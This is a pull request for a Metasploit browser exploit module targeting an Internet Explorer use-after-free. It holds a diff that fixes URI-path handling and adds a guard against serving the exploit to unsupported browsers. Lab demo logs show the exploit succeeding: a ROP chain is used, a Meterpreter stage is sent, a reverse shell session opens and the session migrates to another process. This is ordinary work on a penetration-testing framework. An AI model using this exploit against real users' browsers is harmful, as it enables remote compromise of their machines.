### PR TITLE
Fix URIPATH and nil target

### DIFF
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -285,7 +285,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";
 				</script>
 
-				<iframe src="#{get_resource}/#{@html2_name}"></iframe>
+				<iframe src="#{this_resource}/#{@html2_name}"></iframe>
 				<script>
 					#{js}
 		        </script>
@@ -321,10 +321,22 @@ class Metasploit3 < Msf::Exploit::Remote
 		return html
 	end
 
+	def this_resource
+		r = get_resource
+		return ( r == '/') ? '' : r
+	end
+
 	def on_request_uri(cli, request)
 		print_status request.headers['User-Agent']
 		agent = request.headers['User-Agent']
 		my_target = get_target(agent)
+
+		# Avoid the attack if the victim doesn't have the same setup we're targeting
+		if my_target.nil?
+			print_error("Browser not supported: #{agent.to_s}")
+			send_not_found(cli)
+			return
+		end
 
 		vprint_status("Requesting: #{request.uri}")
 
@@ -334,9 +346,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		elsif request.uri =~ /#{@html1_name}/
 			print_status("Loading #{@html1_name}")
 			html = load_html1(cli, my_target)
-		elsif request.uri =~ /#{get_resource}$/
+		elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
 			print_status("Redirecting to #{@html1_name}")
-			send_redirect(cli, "#{get_resource}/#{@html1_name}")
+			send_redirect(cli, "#{this_resource}/#{@html1_name}")
 			return
 		else
 			send_not_found(cli)


### PR DESCRIPTION
Allow random and '/' as URIPATh, also refuse serving the exploit when the browser is unknown.

Demo:

```
msf  exploit(ie_execcommand_uaf) > [*]  Local IP: http://10.0.1.3:8080/bl7PFbo
[*] Server started.
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.0.1.7         ie_execcommand_uaf - Redirecting to hmLFo.html
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.0.1.7         ie_execcommand_uaf - Loading hmLFo.html
[*] 10.0.1.7         ie_execcommand_uaf - Using JRE ROP
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.0.1.7         ie_execcommand_uaf - Loading JFBVAx.html
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.7:49174) at 2012-09-17 10:49:43 -0500
[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.7:49174) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2968)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3336
[+] Successfully migrated to process 



msf  exploit(ie_execcommand_uaf) > [*]  Local IP: http://10.0.1.3:8080/
[*] Server started.
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.0.1.7         ie_execcommand_uaf - Redirecting to KppdS.html
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.0.1.7         ie_execcommand_uaf - Loading KppdS.html
[*] 10.0.1.7         ie_execcommand_uaf - Using JRE ROP
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.0.1.7         ie_execcommand_uaf - Redirecting to KppdS.html
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.0.1.7         ie_execcommand_uaf - Loading ETPjWu.html
[*] 10.0.1.7         ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.0.1.7         ie_execcommand_uaf - Redirecting to KppdS.html
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.7:49183) at 2012-09-17 10:53:09 -0500
[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.7:49183) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1196)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2424
[+] Successfully migrated to process


msf  exploit(ie_execcommand_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.3:4444 
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://10.0.1.3:8080/
[*] Server started.
msf  exploit(ie_execcommand_uaf) > [*] 10.0.1.3         ie_execcommand_uaf - curl/7.19.7 (universal-apple-darwin10.0) libcurl/7.19.7 OpenSSL/0.9.8r zlib/1.2.3
[-] 10.0.1.3         ie_execcommand_uaf - Browser not supported: curl/7.19.7 (universal-apple-darwin10.0) libcurl/7.19.7 OpenSSL/0.9.8r zlib/1.2.3
```
